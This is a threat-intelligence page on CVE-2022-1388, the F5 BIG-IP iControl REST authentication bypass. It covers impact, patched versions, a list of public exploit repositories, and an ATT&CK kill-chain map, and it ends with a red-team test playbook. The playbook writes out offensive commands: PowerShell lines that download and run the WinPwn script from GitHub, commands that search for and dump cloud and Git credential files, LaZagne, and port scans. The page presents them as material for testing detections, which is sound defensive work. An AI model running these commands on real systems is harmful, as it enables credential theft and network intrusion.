CVE-2022-1388

CRITICAL CISA KEV EXPLOIT POC TTE Zero-Day Pub 05/05 Upd 21/10

Overview

This vulnerability is an authentication bypass affecting the iControl REST interface of F5 BIG-IP devices. The root cause lies in improper validation of authentication tokens in the REST management API, allowing unauthorized requests to bypass security checks. The flaw specifically impacts the iControl REST service component across multiple BIG-IP software versions.

Vulnerability Description

On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated

Impact

An attacker can bypass authentication without credentials or user interaction to execute arbitrary commands on the BIG-IP system. This allows full system compromise including remote code execution with administrative privileges, potentially leading to data exfiltration, service disruption, or lateral movement within the network. The vulnerability enables attackers to control critical network infrastructure components, severely impacting business operations.

Solution

F5 Networks recommends upgrading affected BIG-IP versions to fixed releases: 16.1.2.2 or later, 15.1.5.1 or later, 14.1.4.6 or later, and 13.1.5 or later. Versions 12.1.x and 11.6.x have reached End of Technical Support and should be upgraded to supported versions. Detailed patch instructions and advisories are available at https://support.f5.com/csp/article/K23605346. No workarounds are officially recommended; prompt application of vendor patches is essential.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability affecting specific versions of F5 BIG-IP products allows unauthorized requests to bypass iControl REST authentication mechanisms. This flaw arises from improper validation of requests, which can lead to unauthorized access to sensitive functionalities within the affected systems. The iControl REST API is a critical interface for managing and configuring F5 devices, and its compromise can enable attackers to manipulate configurations, access sensitive data, or disrupt services. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical risk to organizations relying on these products for application delivery and security.

Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage crafted requests to the iControl REST API, bypassing authentication checks entirely. This could be achieved by sending specially formatted requests that the system fails to recognize as unauthorized. Scenarios may include an attacker gaining administrative access to modify firewall rules, alter load balancing configurations, or even disable security features. The potential for exploitation is particularly concerning in environments where these products are integrated into critical infrastructure, as it could lead to widespread service disruptions or data breaches.

The real-world impact of this vulnerability is significant, particularly for organizations that utilize F5 BIG-IP products in their network architecture. The ability to bypass authentication could result in unauthorized access to sensitive data, manipulation of application traffic, and even complete system compromise. This not only poses a direct threat to the confidentiality, integrity, and availability of organizational data but also exposes businesses to regulatory penalties, reputational damage, and financial losses. The risk is amplified in sectors such as finance, healthcare, and critical infrastructure, where the consequences of such breaches can be catastrophic.

To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First and foremost, it is crucial to upgrade to the latest patched versions of the affected F5 BIG-IP products, as this will address the underlying flaw. Additionally, organizations should conduct regular security assessments and penetration testing to identify potential weaknesses in their configurations and access controls. Monitoring network traffic for unusual patterns or unauthorized access attempts can also help in early detection of exploitation attempts. Employing strong authentication mechanisms, such as multi-factor authentication, can further bolster security and reduce the risk of unauthorized access.

In conclusion, the vulnerability affecting the iControl REST API of F5 BIG-IP products presents a critical threat to organizations that depend on these systems for application delivery and security. The potential for exploitation is high, with severe implications for business operations and data security. By prioritizing timely updates, proactive monitoring, and robust security practices, organizations can mitigate the risks associated with this vulnerability and protect their critical assets from malicious actors. The ongoing vigilance and adaptation of security strategies are essential in the ever-evolving landscape of cybersecurity threats.




CSURFACE threat intelligence has detected a moderate increase in exploitation attempts targeting the CVE-2022-1388 vulnerability in F5 BIG-IP systems. This uptick in activity, reflected by a discernible rise in telemetry signals, indicates sustained adversary interest despite the vulnerability’s age and the availability of patches. Notably, the persistence of multiple publicly available proof-of-concept exploits continues to lower the barrier for threat actors, including ransomware groups such as BackdoorDiplomacy, to weaponize this flaw. Although the EPSS score remains high and stable, the incremental growth in exploitation attempts underscores an ongoing risk that defenders must monitor closely. This evolving threat landscape suggests that organizations running affected BIG-IP versions remain prime targets for unauthorized access and potential ransomware deployment, maintaining the vulnerability’s critical status within the current risk environment.



Update 2 — May 16, 2026

CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting the CVE-2022-1388 vulnerability on F5 BIG-IP devices. This uptick, while modest, reflects a continuing trend of adversaries leveraging publicly available proof-of-concept exploits to bypass authentication controls. Our telemetry indicates that threat actors, including ransomware-associated groups such as BackdoorDiplomacy, remain actively engaged in reconnaissance and exploitation efforts. Although the EPSS score remains consistently high and stable, the observed increase in activity underscores that the vulnerability continues to be a viable vector for unauthorized access and potential ransomware deployment. This evolving exploitation landscape reinforces the critical risk posture of affected BIG-IP versions and highlights the necessity for ongoing vigilance in monitoring and defense.

Affected Products (66)

Vendor Product Version CPE
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Analytics All cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Analytics All cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Analytics All cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Analytics All cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Analytics All cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Analytics All cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Application Acceleration Manager All cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Application Acceleration Manager All cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*
+46 additional CPEs
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
F5 BIG-IP iControl RCE via REST Authentication Bypass
exploits/linux/http/f5_icontrol_rce
Heyder Andrade Unknown - View

ExploitDB (1)

Title Author Type Platform Date Link
F5 BIG-IP 16.0.x - Remote Code Execution (RCE) Yesith Alvarez remote multiple - View

GitHub PoCs (65)

Repository Author Stars Forks Date Link
horizon3ai/CVE-2022-1388
POC for CVE-2022-1388
horizon3ai 230 37 2022-05-09 View
doocop/CVE-2022-1388-EXP
CVE-2022-1388 F5 BIG-IP RCE 批量检测
doocop 93 20 2022-05-07 View
0xf4n9x/CVE-2022-1388
CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE
0xf4n9x 83 29 2022-05-09 View
alt3kx/CVE-2022-1388_PoC
F5 BIG-IP RCE exploitation (CVE-2022-1388)
alt3kx 87 17 2022-05-09 View
ZephrFish/F5-CVE-2022-1388-Exploit
Exploit and Check Script for CVE 2022-1388
ZephrFish 59 29 2022-05-09 View
sherlocksecurity/CVE-2022-1388-Exploit-POC
PoC for CVE-2022-1388_F5_BIG-IP
sherlocksecurity 57 12 2022-05-09 View
numanturle/CVE-2022-1388
K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388
numanturle 53 12 2022-05-05 View
Al1ex/CVE-2022-1388
CVE-2022-1388 F5 BIG-IP iControl REST RCE
Al1ex 37 12 2022-05-09 View
jheeree/CVE-2022-1388-checker
Simple script realizado en bash, para revisión de múltiples hosts para CVE-2022-1388 (F5)
jheeree 25 13 2022-05-05 View
MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed
This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management...
MrCl0wnLab 28 9 2022-05-06 View
Zeyad-Azima/CVE-2022-1388
F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB
Zeyad-Azima 12 6 2022-05-12 View
PsychoSec2/CVE-2022-1388-POC
An Improved Proof of Concept for CVE-2022-1388 w/ an Interactive Shell
PsychoSec2 14 4 2022-05-15 View
justakazh/CVE-2022-1388
Tool for CVE-2022-1388
justakazh 13 4 2022-05-13 View
west9b/F5-BIG-IP-POC
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合
west9b 10 2 2022-05-28 View
blind-intruder/CVE-2022-1388-RCE-checker-and-POC-Exploit
blind-intruder 7 3 2022-05-08 View
Vulnmachines/F5-Big-IP-CVE-2022-1388
CVE-2022-1388 F5 Big IP unauth remote code execution
Vulnmachines 6 4 2022-05-09 View
Henry4E36/CVE-2022-1388
F5 BIG-IP iControl REST身份验证绕过漏洞
Henry4E36 8 1 2022-05-09 View
qusaialhaddad/F5-BigIP-CVE-2022-1388
Reverse Shell for CVE-2022-1388
qusaialhaddad 7 1 2022-05-10 View
vaelwolf/CVE-2022-1388
-- FOR EDUCATIONAL USE ONLY -- Proof-of-Concept RCE for CVE-2022-1388, plus some added functionality for blue and red te...
vaelwolf 7 1 2022-12-24 View
Stonzyy/Exploit-F5-CVE-2022-1388
PoC For F5 BIG-IP - bash script Exploit one Liner
Stonzyy 5 3 2022-05-10 View
Angus-Team/F5-BIG-IP-RCE-CVE-2022-1388
Angus-Team 5 3 2022-05-10 View
0x7eTeam/CVE-2022-1388-PocExp
CVE-2022-1388-PocExp,新增了多线程,F5 BIG-IP RCE exploitation
0x7eTeam 6 2 2022-05-10 View
gotr00t0day/CVE-2022-1388
A remote code execution vulnerability exists in the iControl REST API feature of F5's BIG-IP product. An unauthenticated...
gotr00t0day 7 0 2024-04-30 View
AmirHoseinTangsiriNET/CVE-2022-1388-Scanner
AmirHoseinTangsiriNET 5 2 2022-05-11 View
MrCl0wnLab/Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter
CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was ass...
MrCl0wnLab 6 0 2022-05-10 View
bandit92/CVE2022-1388_TestAPI
A Test API for testing the POC against CVE-2022-1388
bandit92 4 2 2022-05-10 View
nvk0x/CVE-2022-1388-exploit
exploit poc
nvk0x 3 1 2024-01-03 View
saucer-man/CVE-2022-1388
CVE-2022-1388
saucer-man 2 1 2022-05-09 View
thatonesecguy/CVE-2022-1388-Exploit
Test and Exploit Scripts for CVE 2022-1388 (F5 Big-IP)
thatonesecguy 1 2 2022-05-10 View
Chocapikk/CVE-2022-1388
CVE-2022-1388 | F5 - Big IP Pre Auth RCE via '/mgmt/tm/util/bash' endpoint
Chocapikk 1 2 2022-06-20 View
revanmalang/CVE-2022-1388
revanmalang 3 0 2022-11-30 View
savior-only/CVE-2022-1388
CVE-2022-1388 F5 BIG-IP iControl REST身份验证绕过漏洞
savior-only 2 0 2022-05-09 View
aancw/CVE-2022-1388-rs
CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust
aancw 2 0 2022-05-17 View
LinJacck/CVE-2022-1388-EXP
CVE-2022-1388-EXP可批量实现攻击
LinJacck 1 1 2022-05-10 View
0xAgun/CVE-2022-1388
0xAgun 1 1 2022-05-10 View
nico989/CVE-2022-1388
PoC for CVE-2022-1388 affecting F5 BIG-IP.
nico989 1 1 2024-01-09 View
yukar1z0e/CVE-2022-1388
batch scan CVE-2022-1388
yukar1z0e 1 1 2022-05-09 View
SecTheBit/CVE-2022-1388
Nuclei Template for CVE-2022-1388
SecTheBit 2 0 2022-05-12 View
devengpk/CVE-2022-1388
devengpk 2 0 2022-12-21 View
superzerosec/CVE-2022-1388
CVE-2022-1388 POC exploit
superzerosec 2 0 2022-05-09 View
vesperp/CVE-2022-1388-F5-BIG-IP
vesperp 1 1 2022-05-10 View
EvilLizard666/CVE-2022-1388
CVE-2022-1388 Scanner
EvilLizard666 2 0 2022-05-11 View
pauloink/CVE-2022-1388
Research and proof of concept related to CVE-2022-1388.
pauloink 0 2 2022-05-11 View
li8u99/CVE-2022-1388
CVE-2022-1388 | F5 - Big IP Pre Auth RCE via '/mgmt/tm/util/bash' endpoint
li8u99 0 2 2022-06-21 View
chesterblue/CVE-2022-1388
POC of CVE-2022-1388
chesterblue 1 0 2022-05-10 View
iveresk/cve-2022-1388-1veresk
Simple shell script for the exploit
iveresk 1 0 2022-05-10 View
shamo0/CVE-2022-1388
BIG-IP iControl REST vulnerability CVE-2022-1388 PoC
shamo0 1 0 2022-05-10 View
iveresk/cve-2022-1388-iveresk-command-shell
Improved POC for CVE-2022-1388 that affects multiple F5 products.
iveresk 1 0 2022-05-15 View
Luchoane/CVE-2022-1388_refresh
PoC for exploiting CVE-2022-1388 on BIG IP F5
Luchoane 1 0 2022-07-01 View
ThinkingOffensively/CVE-2022-1388
cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE
ThinkingOffensively 1 0 2022-10-25 View
amitlttwo/CVE-2022-1388
amitlttwo 1 0 2022-12-06 View
Wrin9/CVE-2022-1388
Wrin9 0 1 2022-05-16 View
j-baines/tippa-my-tongue
F5 BIG-IP Exploit Using CVE-2022-1388 and CVE-2022-41800
j-baines 1 0 2023-04-12 View
jbharucha05/CVE-2022-1388
CVE-2022-1388, bypassing iControl REST authentication
jbharucha05 0 1 2022-07-04 View
SudeepaShiranthaka/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study
F5-BIG-IP Remote Code Execution Vulnerability CVE-2022-1388: A Case Study
SudeepaShiranthaka 0 1 2023-07-12 View
Osyanina/westone-CVE-2022-1388-scanner
A vulnerability scanner that detects CVE-2021-21980 vulnerabilities.
Osyanina 0 0 2022-05-07 View
r0otk3r/CVE-2022-1388
r0otk3r 0 0 2025-07-12 View
sashka3076/F5-BIG-IP-exploit
CVE-2022-1388
sashka3076 0 0 2022-06-04 View
Hudi233/CVE-2022-1388
Hudi233 0 0 2022-05-09 View
mr-vill4in/CVE-2022-1388
CVE-2022-1388
mr-vill4in 0 0 2022-05-11 View
omnigodz/CVE-2022-1388
This repository consists of the python exploit for CVE-2022-1388 (F5's BIG-IP Authentication Bypass to RCE)
omnigodz 0 0 2022-05-11 View
battleofthebots/refresh
CVE-2022-1388 - F5 Router RCE Replica
battleofthebots 0 0 2023-08-01 View
impost0r/CVE-2022-1388
Old weaponized CVE-2022-1388 exploit.
impost0r 0 0 2024-09-12 View
On-Cyber-War/CVE-2022-1388
cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE
On-Cyber-War 0 0 2022-10-25 View
M4fiaB0y/CVE-2022-1388
Scan IP ranges for IP's vulnerable to the F5 Big IP exploit (CVE-2022-1388)
M4fiaB0y 0 0 2022-12-09 View
Exploited in Wild CONFIRMED
Ransomware IN USE
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

20 events
2026-07-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-05
Exploited by BackdoorDiplomacy

Ransomware group known to exploit this vulnerability

2026-03-31
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2022-05-10
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2022-05-05
PoC Published (65 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2022-05-04
Exploit Published (1 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Authentication Bypass
97% auth_bypass
Privilege Escalation
35% privilege_escalation

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059 Command and Scripting Interpreter Kill Chain execution ESXi, IaaS, Identity Provider, Linux, macOS, Network Devices, Office Suite, Windows
T1542.001 System Firmware Kill Chain persistence, defense-evasion Windows, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1046 Network Service Discovery Kill Chain discovery Containers, IaaS, Linux, macOS, Network Devices, Windows
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-166 Force the System to Reset Values
31%
Medium
CAPEC-12 Choosing Message Identifier
30%
High High
CAPEC-216 Communication Channel Manipulation
30%
CAPEC-36 Using Unpublished Interfaces or Functionality
30%
Medium High
CAPEC-62 Cross Site Request Forgery
30%
High Very High

Red Team Playbook

33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1046 Network Service Discovery for Containers containers Shell
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and...
Command (Shell)
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
T1046 Port Scan Linux, macOS Bash
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
Command (Bash)
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1046 Port Scan NMap for Windows Windows PowerShell Privileged
Scan ports to check for listening ports for the local host 127.0.0.1
Command (PowerShell)
nmap #{host_to_scan}
T1046 Port Scan Nmap Linux, macOS Shell Privileged
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
Command (Shell)
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046 Port Scan using nmap (Port range) Linux, macOS Shell Privileged
Scan multiple ports to check for listening ports with nmap
Command (Shell)
nmap -Pn -sV -p #{port_range} #{host}
T1046 Port Scan using python Windows PowerShell
Scan ports to check for listening ports with python
Command (PowerShell)
python "#{filename}" -i #{host_ip}
T1046 Port-Scanning /24 Subnet with PowerShell Windows PowerShell
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in...
Command (PowerShell)
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
T1046 Remote Desktop Services Discovery via PowerShell Windows PowerShell Privileged
Availability of remote desktop services can be checked using get- cmdlet of PowerShell
Command (PowerShell)
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
T1046 WinPwn - MS17-10 Windows PowerShell
Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
T1046 WinPwn - bluekeep Windows PowerShell
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
T1046 WinPwn - fruit Windows PowerShell
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
T1046 WinPwn - spoolvulnscan Windows PowerShell
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
T1059 AutoIt Script Execution Windows PowerShell
An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
Command (PowerShell)
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
T1542.001 UEFI Persistence via Wpbbin.exe File Creation Windows PowerShell Privileged
Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms. - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c -...
Command (PowerShell)
echo "Creating %systemroot%\wpbbin.exe"      
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
